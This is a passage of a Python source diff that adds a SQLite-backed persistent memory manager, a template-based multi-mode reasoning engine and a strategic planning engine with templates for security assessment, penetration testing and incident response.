+ ) + """) + + # Strategic plans table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS strategic_plans ( + plan_id TEXT PRIMARY KEY, + title TEXT NOT NULL, + description TEXT NOT NULL, + primary_goal TEXT NOT NULL, + sub_goals BLOB NOT NULL, + timeline BLOB NOT NULL, + milestones BLOB NOT NULL, + success_criteria BLOB NOT NULL, + risk_factors BLOB NOT NULL, + resources_required BLOB NOT NULL, + current_status TEXT NOT NULL, + progress_percentage REAL NOT NULL, + created_at REAL NOT NULL, + updated_at REAL NOT NULL + ) + """) + + # Memory relationships table + self.conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_relationships ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + source_memory_id TEXT NOT NULL, + target_memory_id TEXT NOT NULL, + relationship_type TEXT NOT NULL, + strength REAL NOT NULL, + created_at REAL NOT NULL, + FOREIGN KEY (source_memory_id) REFERENCES memory_entries (memory_id), + FOREIGN KEY (target_memory_id) REFERENCES memory_entries (memory_id) + ) + """) + + self.conn.commit() + self.logger.info("Persistent memory database initialized") + + async def store_memory(self, memory_entry: MemoryEntry) -> str: + """Store a memory entry in persistent storage""" + + try: + # Store in database + self.conn.execute(""" + INSERT OR REPLACE INTO memory_entries + (memory_id, memory_type, content, timestamp, importance, + access_count, last_accessed, decay_rate, tags) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + memory_entry.memory_id, + memory_entry.memory_type.value, + pickle.dumps(memory_entry.content), + memory_entry.timestamp.timestamp(), + memory_entry.importance, + memory_entry.access_count, + memory_entry.last_accessed.timestamp(), + memory_entry.decay_rate, + json.dumps(list(memory_entry.tags)) + )) + + self.conn.commit() + + # Add to working memory if important + if memory_entry.importance > 0.5: + self.working_memory.append(memory_entry) + + # Update cache + self.memory_cache[memory_entry.memory_id] = memory_entry + + self.logger.debug(f"Stored memory: {memory_entry.memory_id}") + return memory_entry.memory_id + + except Exception as e: + self.logger.error(f"Error storing memory: {e}") + return None + + async def retrieve_memory(self, memory_id: str) -> Optional[MemoryEntry]: + """Retrieve a specific memory by ID""" + + # Check cache first + if memory_id in self.memory_cache: + memory = self.memory_cache[memory_id] + memory.access_count += 1 + memory.last_accessed = datetime.now() + return memory + + try: + cursor = self.conn.execute(""" + SELECT * FROM memory_entries WHERE memory_id = ? + """, (memory_id,)) + + row = cursor.fetchone() + if row: + memory = MemoryEntry( + memory_id=row[0], + memory_type=MemoryType(row[1]), + content=pickle.loads(row[2]), + timestamp=datetime.fromtimestamp(row[3]), + importance=row[4], + access_count=row[5] + 1, + last_accessed=datetime.now(), + decay_rate=row[7], + tags=set(json.loads(row[8])) + ) + + # Update access count + self.conn.execute(""" + UPDATE memory_entries + SET access_count = ?, last_accessed = ? + WHERE memory_id = ? + """, (memory.access_count, memory.last_accessed.timestamp(), memory_id)) + self.conn.commit() + + # Cache the memory + self.memory_cache[memory_id] = memory + + return memory + + except Exception as e: + self.logger.error(f"Error retrieving memory {memory_id}: {e}") + + return None + + async def search_memories(self, query: str, memory_types: List[MemoryType] = None, + limit: int = 50) -> List[MemoryEntry]: + """Search memories based on content and type""" + + memories = [] + + try: + # Build query conditions + conditions = [] + params = [] + + if memory_types: + type_conditions = " OR ".join(["memory_type = ?"] * len(memory_types)) + conditions.append(f"({type_conditions})") + params.extend([mt.value for mt in memory_types]) + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = self.conn.execute(f""" + SELECT * FROM memory_entries + WHERE {where_clause} + ORDER BY importance DESC, last_accessed DESC + LIMIT ? + """, params + [limit]) + + for row in cursor.fetchall(): + memory = MemoryEntry( + memory_id=row[0], + memory_type=MemoryType(row[1]), + content=pickle.loads(row[2]), + timestamp=datetime.fromtimestamp(row[3]), + importance=row[4], + access_count=row[5], + last_accessed=datetime.fromtimestamp(row[6]), + decay_rate=row[7], + tags=set(json.loads(row[8])) + ) + + # Simple text matching (can be enhanced with vector similarity) + if self._matches_query(memory, query): + memories.append(memory) + + except Exception as e: + self.logger.error(f"Error searching memories: {e}") + + return sorted(memories, key=lambda m: m.importance, reverse=True) + + def _matches_query(self, memory: MemoryEntry, query: str) -> bool: + """Simple text matching for memory search""" + query_lower = query.lower() + + # Search in content + content_str = json.dumps(memory.content).lower() + if query_lower in content_str: + return True + + # Search in tags + for tag in memory.tags: + if query_lower in tag.lower(): + return True + + return False + + async def consolidate_memories(self): + """Consolidate and organize memories""" + + try: + # Get all working memories + working_memories = list(self.working_memory) + + # Group related memories + memory_groups = self._group_related_memories(working_memories) + + # Create consolidated memories + for group in memory_groups: + if len(group) > 1: + consolidated = await self._create_consolidated_memory(group) + await self.store_memory(consolidated) + + self.logger.info(f"Consolidated {len(memory_groups)} memory groups") + + except Exception as e: + self.logger.error(f"Error consolidating memories: {e}") + + def _group_related_memories(self, memories: List[MemoryEntry]) -> List[List[MemoryEntry]]: + """Group related memories together""" + groups = [] + processed = set() + + for memory in memories: + if memory.memory_id in processed: + continue + + # Find related memories + related = [memory] + for other_memory in memories: + if (other_memory.memory_id != memory.memory_id and + other_memory.memory_id not in processed): + + # Simple relatedness check (can be enhanced) + if self._are_memories_related(memory, other_memory): + related.append(other_memory) + processed.add(other_memory.memory_id) + + if related: + groups.append(related) + for mem in related: + processed.add(mem.memory_id) + + return groups + + def _are_memories_related(self, mem1: MemoryEntry, mem2: MemoryEntry) -> bool: + """Check if two memories are related""" + + # Check temporal proximity + time_diff = abs((mem1.timestamp - mem2.timestamp).total_seconds()) + if time_diff < 3600: # Within 1 hour + return True + + # Check tag overlap + tag_overlap = len(mem1.tags.intersection(mem2.tags)) + if tag_overlap > 0: + return True + + # Check content similarity (simple approach) + content1 = json.dumps(mem1.content).lower() + content2 = json.dumps(mem2.content).lower() + + # Simple word overlap + words1 = set(content1.split()) + words2 = set(content2.split()) + overlap_ratio = len(words1.intersection(words2)) / max(len(words1), len(words2)) + + return overlap_ratio > 0.3 + + async def _create_consolidated_memory(self, memories: List[MemoryEntry]) -> MemoryEntry: + """Create a consolidated memory from related memories""" + + # Combine content + consolidated_content = { + "type": "consolidated", + "source_memories": [mem.memory_id for mem in memories], + "combined_content": [mem.content for mem in memories], + "themes": self._extract_themes(memories) + } + + # Calculate importance + importance = max(mem.importance for mem in memories) + + # Combine tags + all_tags = set() + for mem in memories: + all_tags.update(mem.tags) + all_tags.add("consolidated") + + return MemoryEntry( + memory_type=MemoryType.SEMANTIC, + content=consolidated_content, + importance=importance, + tags=all_tags + ) + + def _extract_themes(self, memories: List[MemoryEntry]) -> List[str]: + """Extract common themes from memories""" + + # Simple theme extraction (can be enhanced with NLP) + all_text = " ".join([ + json.dumps(mem.content) for mem in memories + ]).lower() + + # Common cybersecurity themes + themes = [] + security_themes = [ + "vulnerability", "threat", "attack", "exploit", "malware", + "phishing", "social engineering", "network security", "encryption", + "authentication", "authorization", "firewall", "intrusion" + ] + + for theme in security_themes: + if theme in all_text: + themes.append(theme) + + return themes + + def _start_background_processes(self): + """Start background memory management processes""" + + def consolidation_worker(): + while True: + try: + time.sleep(300) # Every 5 minutes + asyncio.run(self.consolidate_memories()) + except Exception as e: + self.logger.error(f"Consolidation error: {e}") + + def decay_worker(): + while True: + try: + time.sleep(600) # Every 10 minutes + self._apply_memory_decay() + except Exception as e: + self.logger.error(f"Decay error: {e}") + + # Start background threads + self.consolidation_thread = threading.Thread(target=consolidation_worker, daemon=True) + self.decay_thread = threading.Thread(target=decay_worker, daemon=True) + + self.consolidation_thread.start() + self.decay_thread.start() + + self.logger.info("Background memory processes started") + + def _apply_memory_decay(self): + """Apply decay to memories over time""" + + try: + cursor = self.conn.execute(""" + SELECT memory_id, importance, last_accessed, decay_rate + FROM memory_entries + """) + + updates = [] + current_time = datetime.now().timestamp() + + for row in cursor.fetchall(): + memory_id, importance, last_accessed, decay_rate = row + + # Calculate time since last access + time_since_access = current_time - last_accessed + + # Apply decay (exponential decay) + decay_factor = np.exp(-decay_rate * time_since_access / 86400) # Days + new_importance = importance * decay_factor + + # Minimum importance threshold + if new_importance < 0.01: + new_importance = 0.01 + + updates.append((new_importance, memory_id)) + + # Batch update + self.conn.executemany(""" + UPDATE memory_entries SET importance = ? WHERE memory_id = ? + """, updates) + + self.conn.commit() + self.logger.debug(f"Applied decay to {len(updates)} memories") + + except Exception as e: + self.logger.error(f"Error applying memory decay: {e}") + +class AdvancedReasoningEngine: + """Advanced reasoning engine with multiple reasoning types""" + + def __init__(self, memory_manager: PersistentMemoryManager): + self.memory_manager = memory_manager + self.logger = logging.getLogger("reasoning_engine") + + # Reasoning components + self.inference_rules = self._load_inference_rules() + self.reasoning_strategies = { + ReasoningType.DEDUCTIVE: self._deductive_reasoning, + ReasoningType.INDUCTIVE: self._inductive_reasoning, + ReasoningType.ABDUCTIVE: self._abductive_reasoning, + ReasoningType.ANALOGICAL: self._analogical_reasoning, + ReasoningType.CAUSAL: self._causal_reasoning, + ReasoningType.STRATEGIC: self._strategic_reasoning, + ReasoningType.COUNTERFACTUAL: self._counterfactual_reasoning, + ReasoningType.META_COGNITIVE: self._meta_cognitive_reasoning + } + + # Active reasoning chains + self.active_chains = {} + + def _load_inference_rules(self) -> Dict[str, Dict[str, Any]]: + """Load inference rules for different reasoning types""" + + return { + "modus_ponens": { + "pattern": "If P then Q, P is true", + "conclusion": "Q is true", + "confidence_base": 0.9 + }, + "modus_tollens": { + "pattern": "If P then Q, Q is false", + "conclusion": "P is false", + "confidence_base": 0.85 + }, + "hypothetical_syllogism": { + "pattern": "If P then Q, If Q then R", + "conclusion": "If P then R", + "confidence_base": 0.8 + }, + "disjunctive_syllogism": { + "pattern": "P or Q, not P", + "conclusion": "Q", + "confidence_base": 0.8 + }, + "causal_inference": { + "pattern": "Event A precedes Event B, correlation observed", + "conclusion": "A may cause B", + "confidence_base": 0.6 + } + } + + async def start_reasoning_chain(self, topic: str, goal: str, + reasoning_type: ReasoningType = ReasoningType.DEDUCTIVE) -> str: + """Start a new reasoning chain""" + + chain = ReasoningChain( + topic=topic, + goal=goal, + metadata={"reasoning_type": reasoning_type.value} + ) + + self.active_chains[chain.chain_id] = chain + + # Store in memory + memory_entry = MemoryEntry( + memory_type=MemoryType.PROCEDURAL, + content={ + "type": "reasoning_chain_start", + "chain_id": chain.chain_id, + "topic": topic, + "goal": goal, + "reasoning_type": reasoning_type.value + }, + importance=0.7, + tags={"reasoning", "chain_start", reasoning_type.value} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.info(f"Started reasoning chain: {chain.chain_id}") + return chain.chain_id + + async def add_reasoning_step(self, chain_id: str, premise: str, + inference_rule: str = "", evidence: List[str] = None) -> str: + """Add a step to an active reasoning chain""" + + if chain_id not in self.active_chains: + self.logger.error(f"Reasoning chain {chain_id} not found") + return None + + chain = self.active_chains[chain_id] + evidence = evidence or [] + + # Determine reasoning type from chain metadata + reasoning_type = ReasoningType(chain.metadata.get("reasoning_type", "deductive")) + + # Apply reasoning strategy + reasoning_func = self.reasoning_strategies.get(reasoning_type, self._deductive_reasoning) + conclusion, confidence = await reasoning_func(premise, inference_rule, evidence, chain) + + # Create reasoning step + step = ReasoningStep( + reasoning_type=reasoning_type, + premise=premise, + inference_rule=inference_rule, + conclusion=conclusion, + confidence=confidence, + evidence=evidence, + dependencies=[s.step_id for s in chain.steps[-3:]] # Last 3 steps + ) + + chain.steps.append(step) + + # Store step in memory + memory_entry = MemoryEntry( + memory_type=MemoryType.PROCEDURAL, + content={ + "type": "reasoning_step", + "chain_id": chain_id, + "step_id": step.step_id, + "premise": premise, + "conclusion": conclusion, + "confidence": confidence, + "inference_rule": inference_rule + }, + importance=confidence, + tags={"reasoning", "step", reasoning_type.value} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.debug(f"Added reasoning step to chain {chain_id}") + return step.step_id + + async def _deductive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply deductive reasoning""" + + # Look up inference rule + if inference_rule in self.inference_rules: + rule = self.inference_rules[inference_rule] + base_confidence = rule["confidence_base"] + + # Apply rule logic (simplified) + if "modus_ponens" in inference_rule.lower(): + conclusion = f"Therefore, the consequent follows from the premise: {premise}" + confidence = base_confidence + else: + conclusion = f"Following {inference_rule}: {premise}" + confidence = base_confidence * 0.8 + else: + # Default deductive reasoning + conclusion = f"Based on logical deduction from: {premise}" + confidence = 0.7 + + # Adjust confidence based on evidence + if evidence: + confidence = min(confidence + len(evidence) * 0.05, 0.95) + + return conclusion, confidence + + async def _inductive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply inductive reasoning""" + + # Inductive reasoning builds general conclusions from specific observations + pattern_strength = len(evidence) / max(len(chain.steps) + 1, 1) + + conclusion = f"Based on observed pattern in {len(evidence)} cases: {premise}" + confidence = min(0.3 + pattern_strength * 0.4, 0.8) # Inductive reasoning is less certain + + return conclusion, confidence + + async def _abductive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply abductive reasoning (inference to best explanation)""" + + # Abductive reasoning finds the best explanation for observations + explanation_quality = len(evidence) * 0.1 + + conclusion = f"Best explanation for '{premise}' given available evidence" + confidence = min(0.5 + explanation_quality, 0.75) # Moderate confidence + + return conclusion, confidence + + async def _analogical_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply analogical reasoning""" + + # Search for similar past experiences in memory + similar_memories = await self.memory_manager.search_memories( + premise, [MemoryType.EPISODIC], limit=5 + ) + + if similar_memories: + analogy_strength = len(similar_memories) * 0.15 + conclusion = f"By analogy to {len(similar_memories)} similar cases: {premise}" + confidence = min(0.4 + analogy_strength, 0.7) + else: + conclusion = f"No strong analogies found for: {premise}" + confidence = 0.3 + + return conclusion, confidence + + async def _causal_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply causal reasoning""" + + # Look for temporal and correlational patterns + causal_indicators = ["caused by", "resulted in", "led to", "triggered"] + + causal_strength = sum(1 for indicator in causal_indicators if indicator in premise.lower()) + temporal_evidence = len([e for e in evidence if "time" in e.lower() or "sequence" in e.lower()]) + + conclusion = f"Causal relationship identified: {premise}" + confidence = min(0.4 + (causal_strength * 0.1) + (temporal_evidence * 0.1), 0.8) + + return conclusion, confidence + + async def _strategic_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply strategic reasoning for long-term planning""" + + # Strategic reasoning considers multiple steps and long-term goals + strategic_depth = len(chain.steps) + goal_alignment = 0.8 if chain.goal.lower() in premise.lower() else 0.5 + + conclusion = f"Strategic implication: {premise} aligns with long-term objectives" + confidence = min(goal_alignment + (strategic_depth * 0.05), 0.85) + + return conclusion, confidence + + async def _counterfactual_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply counterfactual reasoning (what-if scenarios)""" + + # Counterfactual reasoning explores alternative scenarios + scenario_plausibility = 0.6 # Default plausibility + + if "what if" in premise.lower() or "if not" in premise.lower(): + scenario_plausibility += 0.1 + + conclusion = f"Counterfactual analysis: {premise} would lead to alternative outcomes" + confidence = min(scenario_plausibility, 0.7) # Inherently speculative + + return conclusion, confidence + + async def _meta_cognitive_reasoning(self, premise: str, inference_rule: str, + evidence: List[str], chain: ReasoningChain) -> Tuple[str, float]: + """Apply meta-cognitive reasoning (reasoning about reasoning)""" + + # Meta-cognitive reasoning evaluates the reasoning process itself + reasoning_quality = sum(step.confidence for step in chain.steps) / max(len(chain.steps), 1) + + conclusion = f"Meta-analysis of reasoning quality: {reasoning_quality:.2f} average confidence" + confidence = reasoning_quality + + return conclusion, confidence + + async def complete_reasoning_chain(self, chain_id: str) -> Optional[ReasoningChain]: + """Complete a reasoning chain and store results""" + + if chain_id not in self.active_chains: + self.logger.error(f"Reasoning chain {chain_id} not found") + return None + + chain = self.active_chains[chain_id] + chain.end_time = datetime.now() + + # Generate final conclusion + if chain.steps: + # Combine conclusions from all steps + step_conclusions = [step.conclusion for step in chain.steps] + chain.conclusion = f"Final reasoning conclusion: {' โ†’ '.join(step_conclusions[-3:])}" + + # Calculate overall confidence + confidences = [step.confidence for step in chain.steps] + chain.confidence = sum(confidences) / len(confidences) if confidences else 0.0 + + chain.success = chain.confidence > 0.5 + else: + chain.conclusion = "No reasoning steps completed" + chain.success = False + + # Store completed chain in database + try: + self.memory_manager.conn.execute(""" + INSERT OR REPLACE INTO reasoning_chains + (chain_id, topic, goal, steps, conclusion, confidence, + start_time, end_time, success, metadata) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + chain.chain_id, + chain.topic, + chain.goal, + pickle.dumps(chain.steps), + chain.conclusion, + chain.confidence, + chain.start_time.timestamp(), + chain.end_time.timestamp(), + chain.success, + pickle.dumps(chain.metadata) + )) + + self.memory_manager.conn.commit() + + # Store in episodic memory + memory_entry = MemoryEntry( + memory_type=MemoryType.EPISODIC, + content={ + "type": "completed_reasoning_chain", + "chain_id": chain.chain_id, + "topic": chain.topic, + "conclusion": chain.conclusion, + "success": chain.success, + "duration": (chain.end_time - chain.start_time).total_seconds() + }, + importance=chain.confidence, + tags={"reasoning", "completed", chain.metadata.get("reasoning_type", "unknown")} + ) + + await self.memory_manager.store_memory(memory_entry) + + # Remove from active chains + del self.active_chains[chain_id] + + self.logger.info(f"Completed reasoning chain: {chain_id}") + return chain + + except Exception as e: + self.logger.error(f"Error completing reasoning chain: {e}") + return None + +class StrategicPlanningEngine: + """Long-term strategic planning and goal decomposition""" + + def __init__(self, memory_manager: PersistentMemoryManager, reasoning_engine: AdvancedReasoningEngine): + self.memory_manager = memory_manager + self.reasoning_engine = reasoning_engine + self.logger = logging.getLogger("strategic_planning") + + # Planning templates + self.planning_templates = self._load_planning_templates() + + # Active plans + self.active_plans = {} + + def _load_planning_templates(self) -> Dict[str, Dict[str, Any]]: + """Load strategic planning templates""" + + return { + "cybersecurity_assessment": { + "phases": [ + "reconnaissance", + "vulnerability_analysis", + "threat_modeling", + "risk_assessment", + "mitigation_planning", + "implementation", + "monitoring" + ], + "typical_duration": 30, # days + "success_criteria": [ + "Complete security posture assessment", + "Identified all critical vulnerabilities", + "Developed mitigation strategies", + "Implemented security controls" + ] + }, + "penetration_testing": { + "phases": [ + "scoping", + "information_gathering", + "threat_modeling", + "vulnerability_assessment", + "exploitation", + "post_exploitation", + "reporting" + ], + "typical_duration": 14, # days + "success_criteria": [ + "Identified exploitable vulnerabilities", + "Demonstrated business impact", + "Provided remediation recommendations" + ] + }, + "incident_response": { + "phases": [ + "detection", + "analysis", + "containment", + "eradication", + "recovery", + "lessons_learned" + ], + "typical_duration": 7, # days + "success_criteria": [ + "Contained security incident", + "Minimized business impact", + "Prevented future incidents" + ] + } + } + + async def create_strategic_plan(self, title: str, primary_goal: str, + template_type: str = "cybersecurity_assessment") -> str: + """Create a new strategic plan""" + + template = self.planning_templates.get(template_type, {}) + + # Decompose primary goal into sub-goals + sub_goals = await self._decompose_goal(primary_goal, template) + + # Create timeline + timeline = self._create_timeline(template, sub_goals) + + # Generate milestones + milestones = self._generate_milestones(sub_goals, timeline) + + # Assess risks + risk_factors = await self._assess_risks(primary_goal, sub_goals) + + # Determine resources + resources_required = self._determine_resources(template, sub_goals) + + plan = StrategicPlan( + title=title, + description=f"Strategic plan for {primary_goal}", + primary_goal=primary_goal, + sub_goals=sub_goals, + timeline=timeline, + milestones=milestones, + success_criteria=template.get("success_criteria", []), + risk_factors=risk_factors, + resources_required=resources_required, + current_status="planning" + ) + + # Store in database + try: + self.memory_manager.conn.execute(""" + INSERT INTO strategic_plans + (plan_id, title, description, primary_goal, sub_goals, timeline, + milestones, success_criteria, risk_factors, resources_required, + current_status, progress_percentage, created_at, updated_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + plan.plan_id, + plan.title, + plan.description, + plan.primary_goal, + pickle.dumps(plan.sub_goals), + pickle.dumps(plan.timeline), + pickle.dumps(plan.milestones), + pickle.dumps(plan.success_criteria), + pickle.dumps(plan.risk_factors), + pickle.dumps(plan.resources_required), + plan.current_status, + plan.progress_percentage, + plan.created_at.timestamp(), + plan.updated_at.timestamp() + )) + + self.memory_manager.conn.commit() + + # Add to active plans + self.active_plans[plan.plan_id] = plan + + # Store in episodic memory + memory_entry = MemoryEntry( + memory_type=MemoryType.STRATEGIC, + content={ + "type": "strategic_plan_created", + "plan_id": plan.plan_id, + "title": title, + "primary_goal": primary_goal, + "sub_goals_count": len(sub_goals) + }, + importance=0.8, + tags={"strategic_planning", "plan_created", template_type} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.info(f"Created strategic plan: {plan.plan_id}") + return plan.plan_id + + except Exception as e: + self.logger.error(f"Error creating strategic plan: {e}") + return None + + async def _decompose_goal(self, primary_goal: str, template: Dict[str, Any]) -> List[str]: + """Decompose primary goal into actionable sub-goals""" + + # Start reasoning chain for goal decomposition + chain_id = await self.reasoning_engine.start_reasoning_chain( + topic=f"Goal Decomposition: {primary_goal}", + goal="Break down primary goal into actionable sub-goals", + reasoning_type=ReasoningType.STRATEGIC + ) + + sub_goals = [] + + # Use template phases if available + if "phases" in template: + for phase in template["phases"]: + sub_goal = f"Complete {phase} phase for {primary_goal}" + sub_goals.append(sub_goal) + + # Add reasoning step + await self.reasoning_engine.add_reasoning_step( + chain_id, + f"Phase {phase} is essential for achieving {primary_goal}", + "strategic_decomposition" + ) + else: + # Generic decomposition + generic_phases = [ + "planning and preparation", + "implementation and execution", + "monitoring and evaluation", + "optimization and improvement" + ] + + for phase in generic_phases: + sub_goal = f"Complete {phase} for {primary_goal}" + sub_goals.append(sub_goal) + + # Complete reasoning chain + await self.reasoning_engine.complete_reasoning_chain(chain_id) + + return sub_goals + + def _create_timeline(self, template: Dict[str, Any], sub_goals: List[str]) -> Dict[str, datetime]: + """Create timeline for strategic plan""" + + timeline = {} + start_date = datetime.now() + + # Total duration from template or estimate + total_duration = template.get("typical_duration", len(sub_goals) * 3) # days + duration_per_goal = total_duration / len(sub_goals) if sub_goals else 1 + + current_date = start_date + + for i, sub_goal in enumerate(sub_goals): + timeline[f"sub_goal_{i}_start"] = current_date + timeline[f"sub_goal_{i}_end"] = current_date + timedelta(days=duration_per_goal) + current_date = timeline[f"sub_goal_{i}_end"] + + timeline["plan_start"] = start_date + timeline["plan_end"] = current_date + + return timeline + + def _generate_milestones(self, sub_goals: List[str], timeline: Dict[str, datetime]) -> List[Dict[str, Any]]: + """Generate milestones for strategic plan""" + + milestones = [] + + for i, sub_goal in enumerate(sub_goals): + milestone = { + "milestone_id": str(uuid.uuid4()), + "title": f"Milestone {i+1}: {sub_goal}", + "description": f"Complete sub-goal: {sub_goal}", + "target_date": timeline.get(f"sub_goal_{i}_end", datetime.now()), + "success_criteria": [f"Successfully complete {sub_goal}"], + "status": "pending", + "progress_percentage": 0.0 + } + + milestones.append(milestone) + + return milestones + + async def _assess_risks(self, primary_goal: str, sub_goals: List[str]) -> List[str]: + """Assess potential risks for the strategic plan""" + + # Start reasoning chain for risk assessment + chain_id = await self.reasoning_engine.start_reasoning_chain( + topic=f"Risk Assessment: {primary_goal}", + goal="Identify potential risks and mitigation strategies", + reasoning_type=ReasoningType.STRATEGIC + ) + + # Common cybersecurity risks + common_risks = [ + "Technical complexity may exceed available expertise", + "Timeline constraints may impact quality", + "Resource availability may be limited", + "External dependencies may cause delays", + "Changing requirements may affect scope", + "Security vulnerabilities may be discovered during implementation", + "Stakeholder availability may be limited" + ] + + # Assess relevance of each risk + relevant_risks = [] + + for risk in common_risks: + # Add reasoning step for each risk + await self.reasoning_engine.add_reasoning_step( + chain_id, + f"Risk consideration: {risk}", + "risk_assessment" + ) + + relevant_risks.append(risk) + + # Complete reasoning chain + await self.reasoning_engine.complete_reasoning_chain(chain_id) + + return relevant_risks + + def _determine_resources(self, template: Dict[str, Any], sub_goals: List[str]) -> List[str]: + """Determine required resources for strategic plan""" + + # Common resources for cybersecurity plans + base_resources = [ + "Cybersecurity expertise", + "Technical infrastructure access", + "Documentation and reporting tools", + "Communication and collaboration platforms" + ] + + # Template-specific resources + if "resources" in template: + base_resources.extend(template["resources"]) + + # Add resources based on sub-goals + specialized_resources = [] + + for sub_goal in sub_goals: + if "vulnerability" in sub_goal.lower(): + specialized_resources.append("Vulnerability scanning tools") + elif "penetration" in sub_goal.lower(): + specialized_resources.append("Penetration testing tools") + elif "monitoring" in sub_goal.lower(): + specialized_resources.append("Security monitoring platforms") + + return list(set(base_resources + specialized_resources)) + + async def update_plan_progress(self, plan_id: str, milestone_id: str = None, + progress_percentage: float = None, status: str = None) -> bool: + """Update progress of strategic plan""" + + try: + if plan_id not in self.active_plans: + # Load from database + plan = await self._load_plan(plan_id) + if not plan: + self.logger.error(f"Plan {plan_id} not found") + return False + self.active_plans[plan_id] = plan + + plan = self.active_plans[plan_id] + + # Update milestone if specified + if milestone_id: + for milestone in plan.milestones: + if milestone["milestone_id"] == milestone_id: + if progress_percentage is not None: + milestone["progress_percentage"] = progress_percentage + if status: + milestone["status"] = status + break + + # Update overall plan progress + if progress_percentage is not None: + plan.progress_percentage = progress_percentage + + if status: + plan.current_status = status + + plan.updated_at = datetime.now() + + # Update database + self.memory_manager.conn.execute(""" + UPDATE strategic_plans + SET milestones = ?, progress_percentage = ?, + current_status = ?, updated_at = ? + WHERE plan_id = ? + """, ( + pickle.dumps(plan.milestones), + plan.progress_percentage, + plan.current_status, + plan.updated_at.timestamp(), + plan_id + )) + + self.memory_manager.conn.commit() + + # Store progress update in memory + memory_entry = MemoryEntry( + memory_type=MemoryType.EPISODIC, + content={ + "type": "plan_progress_update", + "plan_id": plan_id, + "milestone_id": milestone_id, + "progress_percentage": progress_percentage, + "status": status + }, + importance=0.6, + tags={"strategic_planning", "progress_update"} + ) + + await self.memory_manager.store_memory(memory_entry) + + self.logger.info(f"Updated plan progress: {plan_id}") + return True + + except Exception as e: + self.logger.error(f"Error updating plan progress: {e}") + return False + + async def _load_plan(self, plan_id: str) -> Optional[StrategicPlan]: + """Load strategic plan from database""" + + try: + cursor = self.memory_manager.conn.execute(""" + SELECT * FROM strategic_plans WHERE plan_id = ? + """, (plan_id,)) + + row = cursor.fetchone() + if row: + return StrategicPlan( + plan_id=row[0], + title=row[1], + description=row[2], + primary_goal=row[3], + sub_goals=pickle.loads(row[4]), + timeline=pickle.loads(row[5]), + milestones=pickle.loads(row[6]), + success_criteria=pickle.loads(row[7]), + risk_factors=pickle.loads(row[8]), + resources_required=pickle.loads(row[9]), + current_status=row[10], + progress_percentage=row[11], + created_at=datetime.fromtimestamp(row[12]), + updated_at=datetime.fromtimestamp(row[13]) + ) + + except Exception as e: + self.logger.error(f"Error loading plan {plan_id}: {e}") + + return None + +# Integration class that brings everything together +class PersistentCognitiveSystem: + """Main system that integrates persistent memory, reasoning, and strategic planning""" + + def __init__(self, db_path: str = "data/cognitive_system.db"): + # Initialize components + self.memory_manager = PersistentMemoryManager(db_path) + self.reasoning_engine = AdvancedReasoningEngine(self.memory_manager) + self.strategic_planner = StrategicPlanningEngine(self.memory_manager, self.reasoning_engine) + + self.logger = logging.getLogger("persistent_cognitive_system") + self.logger.info("Persistent cognitive system initialized") + + async def process_complex_scenario(self, scenario: Dict[str, Any]) -> Dict[str, Any]: + """Process a complex cybersecurity scenario using all cognitive capabilities""" + + scenario_id = str(uuid.uuid4()) + self.logger.info(f"Processing complex scenario: {scenario_id}") + + results = { + "scenario_id": scenario_id, + "timestamp": datetime.now().isoformat(), + "results": {} + } + + try: + # Step 1: Store scenario in memory + scenario_memory = MemoryEntry( + memory_type=MemoryType.EPISODIC, + content=scenario, + importance=0.8, + tags={"scenario", "complex", "cybersecurity"} + ) + + memory_id = await self.memory_manager.store_memory(scenario_memory) + results["results"]["memory_id"] = memory_id + + # Step 2: Start strategic planning if it's a long-term objective + if scenario.get("type") == "strategic" or scenario.get("requires_planning", False): + plan_id = await self.strategic_planner.create_strategic_plan( + title=scenario.get("title", f"Scenario {scenario_id}"), + primary_goal=scenario.get("objective", "Complete cybersecurity scenario"), + template_type=scenario.get("template", "cybersecurity_assessment") + ) + + results["results"]["plan_id"] = plan_id + + # Step 3: Apply reasoning to understand the scenario + reasoning_types = scenario.get("reasoning_types", [ReasoningType.DEDUCTIVE]) + reasoning_results = {} + + for reasoning_type in reasoning_types: + chain_id = await self.reasoning_engine.start_reasoning_chain( + topic=f"Scenario Analysis: {scenario.get('title', scenario_id)}", + goal="Analyze and understand the cybersecurity scenario", + reasoning_type=reasoning_type + ) + + # Add reasoning steps based on scenario details + for detail in scenario.get("details", []): + await self.reasoning_engine.add_reasoning_step( + chain_id, + detail, + "scenario_analysis", + scenario.get("evidence", []) + ) + + # Complete reasoning + chain = await self.reasoning_engine.complete_reasoning_chain(chain_id) + reasoning_results[reasoning_type.value] = { + "chain_id": chain_id, + "conclusion": chain.conclusion if chain else "Failed to complete", + "confidence": chain.confidence if chain else 0.0 + } + + results["results"]["reasoning"] = reasoning_results + + # Step 4: Generate recommendations + recommendations = await self._generate_recommendations(scenario, reasoning_results) + results["results"]["recommendations"] = recommendations + + # Step 5: Update long-term memory with insights + insight_memory = MemoryEntry( + memory_type=MemoryType.SEMANTIC, + content={ + "type": "scenario_insight", + "scenario_id": scenario_id, + "key_learnings": recommendations, + "confidence_scores": {k: v["confidence"] for k, v in reasoning_results.items()} + }, + importance=0.7, + tags={"insight", "learning", "cybersecurity"} + ) + + await self.memory_manager.store_memory(insight_memory) + + results["status"] = "success" + 